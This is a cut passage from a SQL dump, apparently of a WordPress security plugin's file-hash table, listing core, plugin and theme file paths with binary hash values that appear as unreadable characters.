�','',0,'?'),('�ى��q��uc�z(��','wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-bulksmush-upsell@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P���غ���2�28','�=�d��q��VX�w�\r\n�/���Ԩ��I$��','',0,'?'),('��X�*^�ϺR���8�','wp-includes/css/dist/block-editor/default-editor-styles-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<���L�v�.�','Rgu`���„g���15�?PLR����*f0','',0,'?'),('����##Ցn\ndA\\�e','wp-includes/blocks/latest-comments/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\'���q4�PS���','��@܎�iSt�\r�-���u�,w��*�n�3','',0,'?'),('��p?E^�@�\'��PE�','wp-admin/edit-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R��C��q�\0��<(�','�ɴ:�6n{W�Qf���8Р��Ġ( �5����','',0,'?'),('������U�\\��a�E','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��ͱ��r0��؅=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('�! d����xO\r<�','wp-content/plugins/wordpress-seo/src/routes/workouts-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j`b��r��WY�ѥx','�/)8���Pk�Me�P�#�MDk�S;�*̿\r�','',0,'?'),('�B����!��vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zz�#uv��\0���','��}���|IR€�v�J�%-�/\n�V���','',0,'?'),('�%��`LY��$��','wp-content/themes/hitmag/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V��;��s��ot�^]','p:�/�R�Լ-�;��b��#;q���','',0,'?'),('�\'&o�Sw6�����(�','wp-content/plugins/wordpress-seo/src/builders/indexable-home-page-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���J\\�)\\\Z��)tn','[`^�ܾ�5�m������w��bc���P�8�','',0,'?'),('�)+�‰��]gg�','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Bold.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fѭ�,Uz�1�h','���\Z��ûF�n\ZJ��Opm�O���nD�J+','',0,'?'),('�0�r��f�o���=\ZZ�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/breadcrumbs-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',': P�q�yX�\\J!��W_','�4\0CS�I氬)�\r�Wz��&B\n@]0_u��M��','',0,'?'),('�2��s|��w�z','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/AbstractGrant.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�?�����oK�l�','���Qܪ���@-a<��|ߛ���&','',0,'?'),('�4��Zs��.]��*','wp-includes/blocks/table/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jw]���6��_���','���B+v?}7(e)��ͻ�.��L|bMH�TQP�','',0,'?'),('�6D*���F��\n�\0�i','wp-content/plugins/wordpress-seo/src/config/wincher-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���bs]${|\n�p��5b','}��J�����9\re���f�c���!��G�','',0,'?'),('�9V#}�X�<��\n[R','wp-includes/blocks/template-part/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U{�9��eMz+d�z&e2','�ip��=] �,Ǟ8a�kt���r�__h�>','',0,'?'),('�<��(��*A]�O�','wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/V��m�Y��w\r��}','��!�Ǖ�k��&�/��-�Pz���a�ٶ�h�ߕ','',0,'?'),('�@{�k�mZ���#�-','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Output/QRMarkup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����L�ϛ��E���','���/9X�Y��}�\n�Ԓ!�<Ik���v�tI#��','',0,'?'),('�D��d.P˴{-yo�g','wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kR�f,�J���k�','��f�!��\rWe��=?��K���jP&�*y�|','',0,'?'),('�I|�K9�(�{s�X','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}����\0���\Z�̿�','|�?b~����ڬ��(�ʹ׺;l�G9��','',0,'?'),('�N\"�,�_�	3���B�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q���Lŧ ���','����:�$�]�5Ĥ�l*�3ٿI�%�','',0,'?'),('�bv��E��H���΄','wp-includes/js/wp-lists.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�]S�1��LY%���','�\\w� :�~�韆�X��Wj��@g���_\Z�-','',0,'?'),('�hS����:���`','wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('�o��M��F�7���','wp-includes/wp-includes/js/dist/reusable-blocks.min.js',0,'�,�F疋��nA�^','�,�F疋��nA�^','�KJE(iLõN��5���KTc�B0$]�-}�۹','',0,'?'),('�s�U\nM�t�mH|Ҭ�','wp-includes/wp-includes/class-wp-locale.php',0,'�S�P�<�#��\0�\':','�S�P�<�#��\0�\':','�D��n]����AW�EH�O�H�@�hAD}','',0,'?'),('��D!�~3�-7���','wp-includes/blocks/avatar/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b,��=���.���5','%����^��Mk���^hiw5O�6��$�!}','',0,'?'),('��� dJ��EC1����','wp-content/plugins/wp-smushit/app/views/nextgen/summary-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �_\n=(;�~�^��','\rހ��sQD�W���_� Y:�_�P��u|9M','',0,'?'),('��i�G���j#��)�','wp-content/plugins/wordpress-seo/src/generated/container.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�U��~mMT\"�O','�4�V^�t`q�#c�}g�ᵈl��P�bP|?y�','',0,'?'),('������n@���+�\"�','wp-includes/wp-includes/js/customize-selective-refresh.js',0,'�uP岉�0x\Z�����','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('����ZD��F��7vp','wp-includes/wp-includes/js/shortcode.min.js',0,'�Ad�\'w#6?��w�','�Ad�\'w#6?��w�','�����Q� 9I��o��T-�79_!���`','',0,'?'),('��˜���MX)�o��','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.min.js',0,'rt\0X��d�xR`��','rt\0X��d�xR`��','��b�ՔW�?��gtRċ\\}�D�E�TӇ��=','',0,'?'),('���&��N�,���6P','wp-admin/images/icons32-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*04�G4F�	&Z�i}\"','�.a�}��hw�6�WEʭ�(3�Jӭ�9�E�','',0,'?'),('��v��#q���ȃ�','wp-includes/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EOxٕX�2떭؃','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('��W31��N���gפ��','wp-includes/js/dist/vendor/react.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rĠN��|��3y�/','���v	X�V��lg;��v�	m�#]�s��','',0,'?'),('��x���Iy��f�Gv�','wp-content/plugins/wordpress-seo/packages/js/images/Yoast_SEO_Icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�m���h��GGU�','}SF�����iQc�_F��\"�MD�K��\rɡa','',0,'?'),('��x[�e��>M�','wp-admin/includes/edit-tag-messages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.j�A8�r��Uq','�?�uZv��*�32;h�$,\r�ME�~��','',0,'?'),('�������1�!��N','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��v06��^n��8��','wp-includes/wp-includes/link-template.php',0,'�Kn~�?��ӂ~d�','�Kn~�?��ӂ~d�','�,�P��en��y����\\A�8����2��','',0,'?'),('�\Zb�ZF���l\r^�','wp-content/plugins/redirection/locale/redirection-fr_CA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�1]�hu�7;�@�','0�D�+��5G�S���\n�@�G�XQ��\0°','',0,'?'),('�;o��O�uT}��@T','wp-content/plugins/wordpress-seo/src/integrations/alerts/abstract-dismissable-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-u���J�fO�h�','� A�$��y��[-�d����Bu\\�	^=7Z@J','',0,'?'),('�N���]{��Uqh��','wp-content/plugins/wp-fastest-cache/templates/permission_error.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~j#����ɬ6:R��','j\\_G�1ΖV:�\Z��ǽ�Cx�w� \"@%+','',0,'?'),('�Y�R�u�Ζ�����','wp-content/plugins/wp-fastest-cache/js/toolbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0I6���\0��k','��m)��t0ۦ�j���ـ��$����2�:�','',0,'?'),('�^tn4\Z�P=�^�-�r','wp-content/plugins/wp-fastest-cache/templates/cdn/photon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Y���8��/o�','�A����7�2�tD��Í�pWͩc�!8�3�','',0,'?'),('�a�<��t!j�j��s��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!!$�}����\'_%]W','Z-�m@�k���W��OɓR�!$[W�F�o�-��','',0,'?'),('�cT��ޤmF=)��','wp-includes/wp-includes/css/dist/edit-post/style.css',0,'�-��b�E��y�L�J��','�-��b�E��y�L�J��','—9 �`��\'@GGXLH��K����Ħ�ᚆ','',0,'?'),('�f���=*�bOs�','wp-includes/style-engine/class-wp-style-engine-css-rule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','= ���nz���g�','�g���n:\'���\r�&5&�*�^�t��yz�','',0,'?'),('�q�h���Bc�92��','wp-admin/network/site-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1-\"n�Ft-C��jvd','A� �/�m꧆[�\'\"T�aU,[�@����e�I','',0,'?'),('���9�!�36���.','wp-content/plugins/insert-headers-and-footers/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q?��\'f��ɓ���','Ùa���\'O�i 2!ަYaC�����`��r','',0,'?'),('���u�r*Y&ep���','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/abstract-link-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/m��g���INo&��<}','���C۸�yT�]��B 1N��Y%��A�rD','',0,'?'),('��n1.Óu�t���lX','wp-admin/css/colors/modern/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nmt��>�\riYm�','W[��g�!�[F�����2l��\\��D�}��d','',0,'?'),('����`%��{��+��','wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�%7�!��.�','{h\0,�]�z�k�V�{җ�6nG\n�x��s9�','',0,'?'),('���v��\\Q���-��','wp-includes/js/tinymce/plugins/hr/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	%>�)���•;��','؃F��S�[k���&�f� 6+�b�>��','',0,'?'),('��aGUϳ�@�A��','wp-content/plugins/wp-fastest-cache/css/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��08`�H�.u��','C~D�[H�$��l���!n�]��ٚ+[�T���','',0,'?'),('�ä2��8�����j','wp-content/plugins/wordpress-seo/src/presenters/debug/marker-close-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~��&WD����_','..�#*�CH�����V��������oi&Y:b�','',0,'?'),('��t��h�	,Gx�\"M','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��R�N\Zb8M�g�|','{�����R�tH}��ܧYQ��{�F\Z�H�','',0,'?'),('�ƚ�ŏH�Wn�\'i�','wp-content/plugins/wp-cerber/assets/goo-translate.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�c�\"C�!㋫x�o','�>��Cv^��/�V����r��cCƨK(��P��','',0,'?'),('��Ū����֍����E','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wpseo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nǠ�K��)����S','Ɂ7�U�<F9d�+�p��$��ʴ�y\\�','',0,'?'),('���9�X����U�7�z','wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�bo i�%H��Xw�Xv','ƅ1h�/jw�<U���\\�k�q%s|W�6��','',0,'?'),('��і�q��SGKy(�','wp-includes/kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�iO��[����','�Z�}*�N��W��5�3U,�H׺ۻ�|x-�B�','',0,'?'),('��}B�[�^�cQ�\n;w','wp-content/plugins/wordpress-seo/inc/wpseo-functions-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J7)�bw+���','��#nRz���n�Z\\�q�@�B���טrOܮ','',0,'?'),('��~n�K$^�R���','wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-login-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�&&bÔl��T�Hְ','fNb�#�a#����㣾$��ò�}��s�e&','',0,'?'),('��:魩�*�/��m¸','wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-post-type-archive-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=fbQ�8yJ�{E�;','W��=ŧ�\\S�LUe����~}\0%��1�o�','',0,'?'),('���A#%��X)��r\\�','wp-content/themes/hitmag/inc/kirki/core/class-kirki-toolkit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-)45mH��QR���','x��}�W�<Qq�8����W���g�L�mw�','',0,'?'),('�	8�7����ix��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/eo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a\'OpQxw���4$��','*Dk��q��T+��R��01�Z��쐔���','',0,'?'),('�+S����X�j.?n','wp-content/plugins/wordpress-seo/src/schema-templates/recipe.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EdM;�㍧Px��6r9','�F��Q��`�q���I�RT�g�b��>��2','',0,'?'),('�4�di�I�������%','wp-includes/wp-includes/js/dist/element.min.js',0,' ����)��o��^\n�',' ����)��o��^\n�','l���\Z!:�Ϋ�?!���i����;�i�','',0,'?'),('�\Zu�3��I�zs)�+','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/InvalidArgumentException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�9	���vx�@�F�','z]W�D=.)J>ؐk�D`h@vФ��H���=','',0,'?'),('�9��l�ן? r��q�','wp-includes/class-wp-user-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Yϲg&w�O ����','�t�V7���n�`�IBR�V�V��EFռ�B','',0,'?'),('�%��?���)�','wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!z������̥','+���A�S��џbH��濳�$�V�+��N΂�','',0,'?'),('�DS���3.įy}�;','wp-admin/images/browser-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\"��ӠA�\Z����%̝','+啧���0��p�Ɯ��JMk �q�w�Xب�','',0,'?'),('�[�Hn[P�.~���FU|','wp-includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�Dz�r���','J.����I5��\n���;����t�oX����','',0,'?'),('�j��\\��Ħ<y�p�','wp-includes/widgets/class-wp-widget-custom-html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۼ���P�L20��&�','l)�V�\'B\0�:�����hֵf�;\0<Ń��½','',0,'?'),('�t��.!h�t�%h��','wp-includes/blocks/video/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�/���_���g�w�5','a��K:N\\P\"Qf��t�$C��y/�g��','',0,'?'),('�{S��,�@�V����','wp-content/plugins/wp-smushit/app/views/nextgen/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\" 3��\"]ݶg��','�\\�����W�&(�\Z4�8��U�7���m��','',0,'?'),('����tCβ��<\n��/�','wp-includes/wp-includes/embed-template.php',0,'��U�z�A>z�\'!f*','��U�z�A>z�\'!f*','*xJ���\"�t��\r^K$U�09���Z�иC�ru','',0,'?'),('����Z�\Zxcy�d��\'','wp-admin/js/language-chooser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U>�p4J�l��5�=','9���\rX�L�dC5@U���K&>̓l��#�','',0,'?'),('�������,l̵�J�','wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php',0,'\Zjo�\0��y,�*�}c','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('��2���s��k��','wp-includes/blocks/categories/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<-c��8=O�0','v�yc�\Z�p9�GFmUb(�3��/>�','',0,'?'),('�����oy�\\Y.6�','wp-content/plugins/disable-gutenberg/inc/plugin-frontend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\Z3w�|��;�:� L','���<|r���j��(��K^\\P��','',0,'?'),('���6B�b���M��','wp-content/plugins/wordpress-seo/inc/sitemaps/class-author-sitemap-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�s=/U%�;)�}�L�','h�8�|��E�\rG�}�e_�@�(�%Rb*Cz��','',0,'?'),('���%���\\(w����&','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I\0��$K��  �	','V�p\Z�1͌э�\'=~�ٲ�F_u\\��P�','',0,'?'),('�����:x�=�}�','wp-includes/js/jquery/ui/mouse.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ġ3mZ�\r�d���','A7�tg��?�.:��q����g-0߇\r����','',0,'?'),('��YVe��]R��f��&�','wp-content/plugins/wp-cerber/assets/flags/bt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�x6�)�sN	d%�','f\'��{5GL����B��u�+r����{��','',0,'?'),('��H�a�+����̰I�','wp-content/plugins/wordfence/waf/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}\r�ئ���8�W��','�gʌ�pqn��v<]�����I�AH���Ȉ','',0,'?'),('��{��e�E�C��@@7','wp-includes/wp-includes/js/comment-reply.min.js',0,';Yó8y�F0��P^',';Yó8y�F0��P^','�o��%cܫԕ-��zt�����Qs��<{�','',0,'?'),('��O�I��Y�\\�{=�H','wp-includes/robots-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӎ|Ylm�+�6V��','X�6��hq@!��`+��\rx!����	Е�ī�>','',0,'?'),('��Tn�3<[�� ��5','wp-includes/rest-api/endpoints/class-wp-rest-menus-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d&�%|��/�6��','���\'��f�r�g��7��\"hz�B�y�f�','',0,'?'),('��-s<̫Eʃ��R��','wp-content/plugins/wp-cerber/assets/flags/lc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����^m�W�˽�','�oâ��r*N	{,�0�>��\"����uW�','',0,'?'),('��y�&a�A�7�]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%���B\ng�2��;','D,�A�J���lOS�p�e؇�&���','',0,'?'),('����m~fҾ��w�','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Argument/RewindableGenerator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DK�R��쟙�۹��6','�r��:\'	\"��S�\05g�SƢ�\"��@Nwփ�','',0,'?'),('�ƞׅ\ZX�X]�Y�F','wp-includes/js/codemirror/htmlhint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('�	ϛ��3Rc��Ϲ','wp-content/plugins/redirection/fileio/csv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'8�2���F5O-]�e','�`2���0�`�Y[�~�Z�X�3h���>��','',0,'?'),('�H�Y/��,F��v�','wp-includes/blocks/query-title/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w&ֽ�.���>���',')񇜲��Äp���0�p��v��C��uhFQ�9','',0,'?'),('�zQ���n���1j','wp-content/plugins/wordpress-seo/src/wrappers/wp-remote-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a=]��e����%�N���','B5؆�Tx|U�=䈕���=�^9Gf��rγ�U','',0,'?'),('� a\"KwT�bc1S','wp-admin/css/revisions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@t$�`��j&��s','��$bf���o���Q��t�R+�Azz','',0,'?'),('�$Š@�hAI$&�O�','wp-includes/wp-includes/images/crystal/spreadsheet.png',0,'5�9�Т1�T��n��','5�9�Т1�T��n��','e\rC��i0��[��R�8@���G���aJN�','',0,'?'),('�%��ve�\r���6','wp-content/plugins/wp-smushit/app/views/cdn/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qq�:�5x�,:X��','�\Z�b��5�h.����8��D�t׆#��#��#*','',0,'?'),('�-�[ip��\\^���]','wp-includes/widgets/class-wp-widget-tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�l�¹�+�X��Zܚ','p�^B���&������RO��ގ�D\0','',0,'?'),('�0�&�Y�������','wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('�2l�Ƴ;���-6�','wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�O�w��j/�Q�:','�),��i�t�A,�\r�j�mIi\Z@�O�����L�z','',0,'?'),('�4g��e���>���ߝ','wp-admin/images/list-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hջIS�2��i�g�','��J�p�S_��X��#���UB�-z���,�','',0,'?'),('�4�2ߔN�h����D`','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\���ٽH�T\rގY/','<ܩ�� �`w�z^�ۣB/a�W�(}׋F','',0,'?'),('�;�f�J1��˘��+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n\n��+ծ.jqAZ�','�\0��I������36���ěn�j7jk�:��','',0,'?'),('�OOwT�M\r��Y�!d','wp-includes/js/mediaelement/mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ii��:���ρa���0','�F;(�D��ԥ�����$��Tc�#�Vd\0K','',0,'?'),('�V5e$�4��7���','wp-content/plugins/wordpress-seo/vendor/yoast/i18n-module/src/i18n-wordpressorg-v3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pұ�?�i��.5���B','��-��R��v�W�FP-i�i�@5�l5>��','',0,'?'),('�]ǿ|������IC�','wp-includes/js/dist/keycodes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q@��r\"n-8��','x2�<��8O>�hJڑ��W�&ۣ��׀��|�','',0,'?'),('�fkj��N�Uei4=%�','wp-admin/js/tags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�}���0R�M�T� ','���VkK���C�o��ό8�T�Ayn@��Z\0','',0,'?'),('�xY��4�(RMj2}5}','wp-content/plugins/wordpress-seo/js/dist/externals-components.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O$P�_�jU�py�\\V','oߤ�W��\0���V�󗟓ؘ6QH\nk{�~=','',0,'?'),('�y%���Ǻ~�ne\"V','wp-admin/css/list-tables-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&0�?��:�R��s�G�','�����Lx7���	Jw*y�m�!M��i\n\"EI,�','',0,'?'),('�{�v�.��h��','wp-includes/wp-includes/class-wp-tax-query.php',0,'��}���nBJw�k�0','��}���nBJw�k�0','��,�In����\n��׋�E,��@�h�1����','',0,'?'),('����<��k$�R�F�S','wp-includes/wp-includes/js/dist/plugins.min.js',0,'�Eg���Zm\Z��4\0�','�Eg���Zm\Z��4\0�','�ьZ;�9�c`.�Є�7��7�S��Z?��mߜ','',0,'?'),('��tb�|��{�q','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hq��A����i�','���	q68�xօ�\\��s\rN�~�.��Zخ[\"','',0,'?'),('����(�#��[���','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b� ‘L�ʷi\r','�X��� �ʜxȗ%w(��{rP��F�I�>','',0,'?'),('���/�-�Tǻ�T<�S','wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NkyIk��wה�=i','LS=����Wf&�d\\=]_f�vesW���','',0,'?'),('���@�qּ���d�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php',0,'Qy���?�;�8�V\n�','Qy���?�;�8�V\n�','\0�-��]뮳��XEt)�`��1�C�}Mr2�/','',0,'?'),('��\'�*6�$�b/H���','wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-publisher-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-8�����{��H','2MX%U*�ٌ^���o\\�	 #.�@����kn�','',0,'?'),('���r���N(��M�\\','wp-includes/blocks/post-title/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�EI@\"�V\'���,�','Nk66v�\'/�b��j�7��/��j��','',0,'?'),('���ۖL�����.b','wp-content/plugins/wp-cerber/assets/icons/fonts/crb.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A`1�r�8{W�T7���',']���r���AۀBQ� ���NRy~2�M�/��','',0,'?'),('�v�@�iϡ��9��\"�','wp-content/plugins/wordpress-seo/src/schema-templates/recipe.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A|�H/8�Q�g�W','�Nc�fbr���\"`@�=����2`,�X��3c','',0,'?'),('�)�E)�M�/^�P*x','wp-includes/wp-includes/css/dist/block-directory/style.css',0,'��?)LH\rb��pi','��?)LH\rb��pi','7h����/���/y��3L��\"�U��n��H\n��','',0,'?'),('�.ۖH�f�fk6b#,(','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/fonts/wpmudev-close-icon.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a��##�\0�~6�Q��','=���H����\"V	�n���3��o�`�`攬eZ','',0,'?'),('�1�o%��q�A��','wp-admin/js/inline-edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�\'n�d�EFif@3','�:%�D��y�=A�Ӛ�Y�*3���7�X�t','',0,'?'),('�M2j��\'uB��J�\r^','wp-includes/wp-includes/js/dist/redux-routine.js',0,'K�|�WaU\0��κ�Ht','K�|�WaU\0��κ�Ht','�B&�VJ�ŋd�#�l�f��c;�}3T�%K{','',0,'?'),('�TL �߈,]��զ�m�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�	